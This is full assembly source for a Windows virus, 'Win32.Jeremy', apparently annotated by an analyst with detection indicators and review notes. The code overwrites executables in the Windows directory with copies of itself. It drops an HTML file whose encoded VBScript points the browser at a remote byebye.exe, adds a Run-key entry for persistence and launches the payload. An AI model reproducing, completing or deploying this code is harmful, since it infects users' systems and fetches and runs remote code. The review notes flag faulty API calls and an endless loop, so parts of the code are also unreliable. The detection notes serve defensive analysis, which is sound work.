Contribution - Win32.Jeremy    [by Necronomikon]

  

;********************************
;******** Win32.Jeremy **********
;(c)by Necronomikon /ZeroGravity
;********************************
;Written for one of my real friends who,died through an car accident..... :(
;
;In memories for:
;-----------------
;Jeremy Stephan Garcia
;* 17.05.1984
;+ 08.04.2004

.586p
.model flat
JUMPS

.data

; ---- Working buffers (TASM, flat model, Win32 stdcall APIs) -----------------
; handle1 : passed to GetModuleHandleA as the module-name string; it is never
;           written in this file, so the call receives an empty string.
handle1		db	50 	dup(0)
; handle2 : receives the GetModuleFileNameA output (path of the running image),
;           capped at 50 bytes by the caller.
handle2		db	50 	dup(0)
; maska   : search pattern handed to FindFirstFileA.
maska		db	'*.exe',0
; zgrext  : the four bytes 'dat.' copied after the dot when the new name is built.
zgrext		db	'dat.',0
; handle_ : search handle returned by FindFirstFileA, reused by FindNextFileA.
handle_		dd	0
; _handle : value returned by CreateFileA in addext.
_handle		dd	0
; filedta : buffer handed to FindFirstFileA / FindNextFileA. The fields follow
;           the order of WIN32_FIND_DATAA.
; NOTE(review): WIN32_FIND_DATAA declares cFileName as MAX_PATH (260) bytes and
; the structure is larger than the 44+50+14 bytes laid out here, so the API's
; output region overlaps newfilename/path2/path3 that follow.
filedta:
FileAttributes	dd	0
CreationTime 	db	8	dup(0)
LastAccessTime	db	8	dup(0)
LastWriteTime	db	8	dup(0)
nFileSizeHigh	dd	0
nFileSizeLow	dd	0
dwReserved0	dd	0
dwReserved1	dd	0
; nFileName is pre-filled with 'N' (not zero); it is also the string passed to
; WinExec at label real.
nFileName	db	50	dup('N')
nAltFileName	db	14	dup(0)
; newfilename : found name with its extension replaced (built at stowit/addext).
newfilename	db	50	dup(0)
; path2 : Windows directory (GetWindowsDirectoryA, 25-byte limit), then made
;         the current directory.
path2		db	25	dup(0)
; path3 : current directory at start-up; stored but not read again in this file.
path3		db	260	dup(0)


; Caption and body text of the message box shown at entry (label jeremy).
; Both strings are fixed and appear verbatim in the binary, which makes them
; usable as static string indicators for this sample.
szTitle         db      "*** Win32.Jeremy ***",0
szMessage       db      "*****************************************************************************",13,10
                db      "**Written for one of my friends,who died through an car accident**",13,10
                db      "*****************************************************************************",13,10
                db      "**                    (c) by Necronomikon / ZeroGravity                      **",13,10
                db      "*****************************************************************************",0


;dropme
; Data for the dropped HTML file (used at label @@dropfile).
; htm_handle : file handle returned by _lcreat.
htm_handle      dd ?
; htmdropper : file name appended to the Windows directory path.
htmdropper  	db      '\jeremy.htm', 0
; szhtm      : receives "<Windows dir>\jeremy.htm" (GetWindowsDirectoryA + lstrcat).
szhtm		db 	220 dup (0)

; htm_ (below) is the dropped file's content, stored as decimal ASCII codes and
; terminated by a 0 byte. Decoded, it is an HTML page with an embedded
; <Script Language=vbs> block. Indicators visible in the decoded text:
;   - marker value written to HKCU\software\win32Jeremy\
;   - script copy to <GetSpecialFolder(0)>\jeremy.vbs (folder 0 = Windows folder)
;   - read of HKCU\Software\Microsoft\Internet Explorer\Download Directory
;   - HKCU\Software\Microsoft\Internet Explorer\Main\Start Page set to
;     hxxp://win32jeremy[.]tripod[.]com/byebye.exe, or to about:blank on the
;     branch where byebye.exe is already in the download directory
;   - HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RUN written
;     with <Windows folder>\byebye.exe
;   - byebye.exe copied to the Windows folder and started via WScript.Shell.Run
; Detection notes: file creation of jeremy.htm / jeremy.vbs / byebye.exe in the
; Windows directory, and writes to the IE Start Page and CurrentVersion\RUN
; values by a script host, are the observable artefacts of this payload.
htm_ db 60,104,116,109,108,62,13,10,13,10,60,98,111,100,121,32
db 98,103,99,111,108,111,114,61,34,98,108,97,99,107,34,32
db 108,105,110,107,61,34,35,48,48,48,48,48,48,34,32,118
db 108,105,110,107,61,34,35,48,48,48,48,48,48,34,32,97
db 108,105,110,107,61,34,35,102,102,48,48,48,48,34,32,116
db 101,120,116,61,108,105,109,101,62,13,10,60,99,101,110,116
db 101,114,62,13,10,60,98,114,62,13,10,60,102,111,110,116
db 32,115,105,122,101,61,43,50,62,60,117,62,60,98,62,60
db 102,111,110,116,32,99,111,108,111,114,61,34,35,48,48,56
db 48,70,70,34,62,87,60,47,102,111,110,116,62,60,102,111
db 110,116,32,99,111,108,111,114,61,34,35,48,48,56,67,69
db 56,34,62,105,60,47,102,111,110,116,62,60,102,111,110,116
db 32,99,111,108,111,114,61,34,35,48,48,57,55,68,49,34
db 62,110,60,47,102,111,110,116,62,60,102,111,110,116,32,99
db 111,108,111,114,61,34,35,48,48,65,51,66,57,34,62,51
db 60,47,102,111,110,116,62,60,102,111,110,116,32,99,111,108
db 111,114,61,34,35,48,48,65,69,65,50,34,62,50,60,47
db 102,111,110,116,62,60,102,111,110,116,32,99,111,108,111,114
db 61,34,35,48,48,66,65,56,66,34,62,46,60,47,102,111
db 110,116,62,60,102,111,110,116,32,99,111,108,111,114,61,34
db 35,48,48,67,53,55,52,34,62,74,60,47,102,111,110,116
db 62,60,102,111,110,116,32,99,111,108,111,114,61,34,35,48
db 48,68,49,53,68,34,62,101,60,47,102,111,110,116,62,60
db 102,111,110,116,32,99,111,108,111,114,61,34,35,48,48,68
db 67,52,54,34,62,114,60,47,102,111,110,116,62,60,102,111
db 110,116,32,99,111,108,111,114,61,34,35,48,48,69,56,50
db 69,34,62,101,60,47,102,111,110,116,62,60,102,111,110,116
db 32,99,111,108,111,114,61,34,35,48,48,70,51,49,55,34
db 62,109,60,47,102,111,110,116,62,60,102,111,110,116,32,99
db 111,108,111,114,61,34,35,48,48,70,70,48,48,34,62,121
db 60,47,102,111,110,116,62,60,47,102,111,110,116,62,60,47
db 117,62,60,98,114,62,60,98,114,62,60,98,114,62,13,10
db 60,116,105,116,108,101,62,46,46,46,97,110,100,32,111,110
db 99,101,32,97,103,97,105,110,32,111,110,101,32,111,102,32
db 109,121,32,112,97,108,115,46,46,46,33,63,60,47,116,105
db 116,108,101,62,13,10,60,102,111,110,116,32,115,105,122,101
db 61,45,49,32,99,111,108,111,114,61,119,104,105,116,101,62
db 43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,60
db 98,114,62,60,98,114,62,13,10,87,114,105,116,116,101,110
db 32,102,111,114,32,111,110,101,32,111,102,32,109,121,32,102
db 114,105,101,110,100,115,32,119,104,111,32,100,105,101,100,32
db 116,104,114,111,117,103,104,32,97,110,32,99,97,114,32,97
db 99,99,105,100,101,110,116,13,10,60,98,114,62,60,98,114
db 62,13,10,40,99,41,111,100,101,100,32,105,110,32,71,101
db 114,109,97,110,89,32,50,111,111,52,60,98,114,62,60,98
db 114,62,98,121,32,78,101,99,114,111,110,111,109,105,107,111
db 110,47,90,101,114,111,71,114,97,118,105,116,121,60,98,114
db 62,13,10,60,98,114,62,60,98,114,62,60,47,102,111,110
db 116,62,13,10,60,83,99,114,105,112,116,32,76,97,110,103
db 117,97,103,101,61,118,98,115,62,13,10,114,101,109,32,119
db 105,110,51,50,46,106,101,114,101,109,121,13,10,114,101,109
db 32,40,99,41,32,98,121,32,78,101,99,114,111,110,111,109
db 105,107,111,110,47,90,71,13,10,83,101,116,32,100,111,119
db 110,108,111,97,100,101,114,32,61,32,67,114,101,97,116,101
db 79,98,106,101,99,116,40,34,87,83,99,114,105,112,116,46
db 83,104,101,108,108,34,41,13,10,100,111,119,110,108,111,97
db 100,101,114,46,114,101,103,119,114,105,116,101,32,34,72,75
db 67,85,92,115,111,102,116,119,97,114,101,92,119,105,110,51
db 50,74,101,114,101,109,121,92,34,44,32,34,40,99,41,98
db 121,32,78,101,99,114,111,110,111,109,105,107,111,110,47,90
db 101,114,111,71,114,97,118,105,116,121,34,13,10,83,101,116
db 32,74,101,114,101,109,121,61,32,67,114,101,97,116,101,111
db 98,106,101,99,116,40,34,115,99,114,105,112,116,105,110,103
db 46,102,105,108,101,115,121,115,116,101,109,111,98,106,101,99
db 116,34,41,13,10,74,101,114,101,109,121,46,99,111,112,121
db 102,105,108,101,32,119,115,99,114,105,112,116,46,115,99,114
db 105,112,116,102,117,108,108,110,97,109,101,44,74,101,114,101
db 109,121,46,71,101,116,83,112,101,99,105,97,108,70,111,108
db 100,101,114,40,48,41,38,95,13,10,34,92,106,101,114,101
db 109,121,46,118,98,115,34,13,10,90,71,114,97,118,105,116
db 121,61,32,34,34,13,10,90,71,114,97,118,105,116,121,61
db 32,100,111,119,110,108,111,97,100,101,114,46,114,101,103,114
db 101,97,100,40,34,72,75,67,85,92,83,111,102,116,119,97
db 114,101,92,77,105,99,114,111,115,111,102,116,92,73,110,116
db 101,114,110,101,116,32,69,120,112,108,111,114,101,114,92,68
db 111,119,110,108,111,97,100,32,68,105,114,101,99,116,111,114
db 121,34,41,13,10,73,102,32,40,90,71,114,97,118,105,116
db 121,61,32,34,34,41,32,84,104,101,110,13,10,90,71,114
db 97,118,105,116,121,32,61,32,34,99,58,34,13,10,69,110
db 100,32,73,102,13,10,73,102,32,82,105,103,104,116,40,90
db 71,114,97,118,105,116,121,44,32,49,41,32,61,32,34,32
db 92,32,34,32,84,104,101,110,32,90,71,114,97,118,105,116
db 121,32,61,32,77,105,100,40,90,71,114,97,118,105,116,121
db 44,32,49,44,32,76,101,110,40,90,71,114,97,118,105,116
db 121,41,32,45,32,49,41,13,10,73,102,32,78,111,116,32
db 40,74,101,114,101,109,121,46,102,105,108,101,101,120,105,115
db 116,115,40,74,101,114,101,109,121,46,103,101,116,115,112,101
db 99,105,97,108,102,111,108,100,101,114,40,48,41,32,38,32
db 34,92,98,121,101,98,121,101,46,101,120,101,34,41,41,32
db 84,104,101,110,13,10,73,102,32,78,111,116,32,40,74,101
db 114,101,109,121,46,102,105,108,101,101,120,105,115,116,115,40
db 90,71,114,97,118,105,116,121,32,38,32,34,92,98,121,101
db 98,121,101,46,101,120,101,34,41,41,32,84,104,101,110,13
db 10,100,111,119,110,108,111,97,100,101,114,46,114,101,103,119
db 114,105,116,101,32,34,72,75,67,85,92,83,111,102,116,119
db 97,114,101,92,77,105,99,114,111,115,111,102,116,92,73,110
db 116,101,114,110,101,116,32,69,120,112,108,111,114,101,114,92
db 77,97,105,110,92,83,116,97,114,116,32,80,97,103,101,34
db 44,95,13,10,34,104,116,116,112,58,47,47,119,105,110,51
db 50,106,101,114,101,109,121,46,116,114,105,112,111,100,46,99
db 111,109,47,98,121,101,98,121,101,46,101,120,101,34,13,10
db 100,111,119,110,108,111,97,100,101,114,46,114,101,103,119,114
db 105,116,101,32,34,72,75,69,89,95,67,85,82,82,69,78
db 84,95,85,83,69,82,92,83,111,102,116,119,97,114,101,92
db 77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119
db 115,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110
db 92,82,85,78,34,44,95,13,10,74,101,114,101,109,121,46
db 103,101,116,115,112,101,99,105,97,108,102,111,108,100,101,114
db 40,48,41,32,38,32,34,92,98,121,101,98,121,101,46,101
db 120,101,34,13,10,69,108,115,101,13,10,100,111,119,110,108
db 111,97,100,101,114,46,114,101,103,119,114,105,116,101,32,34
db 72,75,69,89,95,67,85,82,82,69,78,84,95,85,83,69
db 82,92,83,111,102,116,119,97,114,101,92,77,105,99,114,111
db 115,111,102,116,92,73,110,116,101,114,110,101,116,32,69,120
db 112,108,111,114,101,114,92,77,97,105,110,92,83,116,97,114
db 116,32,80,97,103,101,34,44,95,13,10,34,97,98,111,117
db 116,58,98,108,97,110,107,34,13,10,74,101,114,101,109,121
db 46,99,111,112,121,102,105,108,101,32,90,71,114,97,118,105
db 116,121,32,38,32,34,92,98,121,101,98,121,101,46,101,120
db 101,34,44,95,13,10,74,101,114,101,109,121,46,103,101,116
db 115,112,101,99,105,97,108,102,111,108,100,101,114,40,48,41
db 32,38,32,34,92,98,121,101,98,121,101,46,101,120,101,34
db 13,10,100,111,119,110,108,111,97,100,101,114,46,114,117,110
db 32,74,101,114,101,109,121,46,103,101,116,115,112,101,99,105
db 97,108,102,111,108,100,101,114,40,48,41,32,38,32,34,92
db 98,121,101,98,121,101,46,101,120,101,34,44,32,49,44,32
db 70,97,108,115,101,13,10,101,110,100,32,105,102,13,10,60
db 47,115,99,114,105,112,116,62,13,10,60,47,66,79,68,89
db 62,13,10,60,47,104,116,109,108,62,13,10,13,10,0



; script_size2 : byte length of the htm_ blob, measured from htm_ to here, so
;                it includes the terminating 0 byte; passed to _lwrite.
script_size2		equ $-htm_

; _off_ : decimal 2722, used as the SetFilePointer distance in addext.
; NOTE(review): presumably the file offset of a name buffer inside the built
; binary -- the source does not show how the value was derived; confirm on a sample.
_off_   equ 2722d
include useful.inc

.code

; api <name>: declares <name> as an external procedure and calls it.
; Arguments must already be pushed by the caller (last pushed = first argument);
; the extrn declaration is repeated at every use of the macro.
; For analysis, the list of "api" invocations below is the sample's full
; import set.
api macro a
extrn a:proc
call a
endm

; jeremy: program entry point (named by "end jeremy").
; Shows MessageBoxA(hWnd = 0, lpText = szMessage, lpCaption = szTitle, uType = 0)
; before anything else runs, so the sample announces itself with a modal dialog.
; Execution then falls through into label real.
jeremy:

push    00000000h                       ; Parameters for MessageBoxA
push    offset szTitle
push    offset szMessage
push    00000000h
api    MessageBoxA

; real: one-time setup, then the first directory search.
; Reached only by fall-through from jeremy (the "je real" later in the file
; follows an unconditional jmp).
real:
; WinExec(nFileName, 1). In the source nFileName holds its initial fill of
; 'N' bytes at this point.
; NOTE(review): presumably the built binary is patched so this field names
; another program (see the write at _off_ in addext) -- confirm on a sample.
push	00000001
push	offset nFileName
api	WinExec

; GetCurrentDirectoryA(260, path3): remember the start-up directory.
push	offset path3
push	260
api	GetCurrentDirectoryA

; GetWindowsDirectoryA(path2, 25), then make it the current directory, so the
; relative '*.exe' search below runs inside the Windows directory.
push 	25
push 	offset path2
api 	GetWindowsDirectoryA

push	offset path2
api	SetCurrentDirectoryA

; GetModuleHandleA(handle1) -- handle1 is an all-zero buffer, i.e. an empty
; module name rather than a NULL pointer.
push	offset	handle1
api	GetModuleHandleA

; GetModuleFileNameA(eax, handle2, 50): path of the running image into handle2.
push 	50
push 	offset handle2
push 	eax
api	GetModuleFileNameA

; FindFirstFileA(maska = '*.exe', filedta); the search handle is kept in handle_.
push	offset filedta
push	offset maska
api	FindFirstFileA

mov	dword ptr [handle_],eax
; A return value of 0 branches to @@dropfile.
; NOTE(review): the documented failure value of FindFirstFileA is
; INVALID_HANDLE_VALUE, so a failed search is not caught by this comparison.
cmp	eax,	0
je	@@dropfile ;        <-------------

; check: filter on the name just returned in filedta.
; Loads the first TWO bytes of nFileName into bx and compares that 16-bit value
; with the single letters J, E, R, E, M, Y ('E' is tested twice). A match sends
; control to nextfile, i.e. the file is skipped. Because the comparison is on a
; word, it matches only when the second byte of the name is 0.
; Anything that does not match falls through to the rename/copy code.
check:
mov	bx,	word ptr[nFileName]
cmp	bx,	'J'
je	nextfile
cmp	bx,	'E'
je	nextfile
cmp	bx,	'R'
je	nextfile
cmp	bx,	'E'
je nextfile
cmp	bx,	'M'
je	nextfile
cmp	bx,	'Y'
je	nextfile

; Build the replacement name: esi = found name, edi = newfilename.
lea	esi,	[nFileName]
lea	edi,	[newfilename]

; stowit: copy bytes from the found name until the first '.' is read.
; The loop has no length limit and the direction flag is not set explicitly
; here; termination relies on the name containing a dot.
stowit:
lodsb
cmp	al,	'.'
je	addext
stosb
jmp	stowit

; addext: finish the new name and replace the found executable.
; Observable effect for a defender: an .exe in the Windows directory is renamed
; to the same base name with a 'dat.' suffix, and a copy of the running image
; takes over the original .exe name.
addext:
; Store the '.' still held in al, then copy the 4 bytes of zgrext ('dat.').
stosb
lea	esi,	[zgrext]
movsw
movsw
; MoveFileA(nFileName, newfilename). Three dwords are pushed for this call.
push	0
push	offset newfilename
push	offset nFileName
api	MoveFileA
;api  lstrcat
; CopyFileA(handle2, nFileName, 0): copy the running image (path in handle2)
; to the original file name; third argument 0 = overwrite allowed.
push	0
push	offset nFileName
push	offset handle2
api	CopyFileA

; CreateFileA on the new copy; the return value is stored in _handle.
; NOTE(review): only two dwords are pushed here, fewer than the documented
; CreateFileA signature takes, so the result of this call is not reliable.
push	2
push	offset nFileName
api	CreateFileA

mov	dword ptr [_handle],eax

; SetFilePointer(eax, _off_, 0, 0): seek to byte 2722 from the file start.
push	dword 0
push       0
push	_off_
push	eax
api	SetFilePointer

mov	eax,	dword ptr [_handle]

; WriteFile with (handle, newfilename, 50) pushed: the 50-byte new-name buffer
; is the data written at _off_.
; NOTE(review): three dwords are pushed, fewer than the documented WriteFile
; signature takes.
push	50
push	offset newfilename
push	eax
api	WriteFile

; _lclose receives eax, which at this point is WriteFile's return value and
; not the value saved in _handle.
push	eax
api	_lclose
jmp nextfile
; Not reachable: it directly follows the unconditional jmp above.
je real

; @@dropfile: write the embedded HTML/VBScript blob to disk.
; Entered when FindFirstFileA or FindNextFileA returns 0. Produces
; "<Windows dir>\jeremy.htm" -- the file-creation event to look for.
@@dropfile:
   ; GetWindowsDirectoryA(szhtm, 50)
   push 50
   push offset szhtm
   api GetWindowsDirectoryA

   ; lstrcat(szhtm, '\jeremy.htm')
   push offset htmdropper
   push offset szhtm
   api lstrcat

   ; _lcreat(szhtm, 0): create/truncate the file, keep the handle.
   push	0
   push	offset szhtm
   api	_lcreat
   mov  [htm_handle],eax

   ; _lwrite(htm_handle, htm_, script_size2): the whole blob including its
   ; trailing 0 byte.
   push	script_size2
   push	offset htm_
   push	[htm_handle]
   api _lwrite

   push	[htm_handle]
   api	_lclose

   ; WinExec(edi, 0). edi is not loaded in this block; it holds whatever the
   ; stowit/addext code (or the called APIs) left in it, not the address of szhtm.
   push	0
   push	edi
   api	WinExec
   ; No jump follows: execution falls through into nextfile.


 ; nextfile: advance the search with FindNextFileA(handle_, filedta).
 ; A non-zero result goes back to check; 0 (no more files or an error) goes to
 ; @@dropfile, which falls through to here again. Once the enumeration is
 ; exhausted the two labels therefore alternate with no visible exit, rewriting
 ; jeremy.htm on every pass. The search handle is never closed in this file.
 nextfile:

	push	offset filedta
	mov	eax,	dword ptr [handle_]
	push	eax
	api	FindNextFileA
	cmp	eax,	0
        je      @@dropfile      ; <-----------------
	jmp	check


; bailout: ExitProcess(0).
; No jump or branch in this file targets this label, and the code above it ends
; in an unconditional jmp, so as written it is never executed.
bailout:
push	0
api	ExitProcess

end jeremy